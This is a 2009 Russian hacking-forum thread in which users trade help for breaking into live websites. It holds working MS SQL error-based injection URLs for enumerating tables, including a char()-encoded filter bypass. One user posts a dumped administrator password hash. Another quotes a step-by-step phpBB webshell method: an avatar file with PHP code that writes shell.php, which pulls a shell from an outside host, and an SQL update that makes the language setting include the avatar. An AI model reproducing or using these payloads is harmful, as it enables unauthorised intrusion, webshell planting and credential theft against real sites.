ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8111  
Старый 15.07.2009, 12:56
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Тут БД mysql. В текущей таблице находятся даные о пользователях mysql. Чтобы просмотреть их - нажми "Обзор"
 
Ответить с цитированием

  #8112  
Старый 15.07.2009, 13:34
Аватар для Isass
Isass
Новичок
Регистрация: 13.07.2009
Сообщений: 5
Провел на форуме:
36005

Репутация: 0
По умолчанию

Зашёл в раздел pwweb в таблице pw_users:
Username NoN,
Password 875e527b6de108747f61decbd553947e:zHoPeRWthe816pjgR ...
Usertype Super Administrator
Какой тип хеша используется?
 
Ответить с цитированием

  #8113  
Старый 15.07.2009, 13:44
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Привет
У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое

нашёл инъекцию
Код:
http://site.ru/index.php?name=Links'
далее довёл до ума

Код:
http://site.ru/index.php?name=Links'))--
\Потом начал крутить таблицы
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
получил 1 табличку audit и решил проверить что ниже
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('audit'))--
На что меня послали куда подальше
Код:
 message: Incorrect syntax near 'audit\'.
видно что он скобку экранировал...(пробовал " ' `)
Как можно это обойти?
Попробовал в хексе но написал еррор
Код:
message: Conversion failed when converting the nvarchar value 'audit' to data type int.

Последний раз редактировалось Byrger; 15.07.2009 в 14:05..
 
Ответить с цитированием

  #8114  
Старый 15.07.2009, 14:12
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх
 
Ответить с цитированием

  #8115  
Старый 15.07.2009, 14:19
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от geezer.code  
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх
Код:
message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
 
Ответить с цитированием

  #8116  
Старый 15.07.2009, 14:25
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Byrger  
Код:
message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.
 
Ответить с цитированием

  #8117  
Старый 15.07.2009, 14:29
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Код:
_http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(97)%2Bchar(117)%2Bchar(100)%2Bchar(105)%2Bchar(116)))--
еще можно попробовать having заюзать..
http://forum.antichat.ru/showpost.php?p=445214&postcount=23
 
Ответить с цитированием

  #8118  
Старый 15.07.2009, 16:15
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Возникла проблема... Пробую залить шелл в phpbb! есть права админа... пробую этот способ:

...
6) Загрузка аваторы с php кодом, а затем инклюд.(Нужны права админа)
Бага тоже очень распространненая, тока почему то ее, мало юзают.
Создаем файл kiborg.txt, пишем в него


Код:
<? 
$file= fopen('shell.php', 'w'); 
fwrite($file, '<? @include("http://kiborg.h10.ru/shell/sim.txt"); ?>');
fclose($file);
?>
Меняем имя файла на kiborg.gif и загружаем его на форум.
Заходим в профайл убеждаемся что аватора загрузилась и смотрим ее имя с путем, будет примерно следующее
/images/avatars/49624519384cd7deb.gif
Создаем файл 1.sql с содержимым


Код:
UPDATE phpbb_config SET config_value=CONCAT('english/../../images/avatars/49624519384cd7deb.gif',CHAR(0)) where config_name='default_lang';
Ну если с мозгами все в порядке, то поймете что здесь накалякано. Востанавливаем через бд.
Ползем по ссылке
http://localhost/phpbb13/faq.php
И если вы все сделали правильно, то по адрессу http://localhost/phpbb13/shell.php должен быть ваш шелл.



Делаю всё как написано, но когда загружаю аватар выдаёт ошибку..((

Цитата:
Общая ошибка

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Подскажите в чём проблема...

Последний раз редактировалось .:[melkiy]:.; 15.07.2009 в 16:21..
 
Ответить с цитированием

  #8119  
Старый 15.07.2009, 16:37
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от geezer.code  
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.
Хорошо, а как дальше колонки крутить если такая проблема?
 
Ответить с цитированием

  #8120  
Старый 15.07.2009, 16:45
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ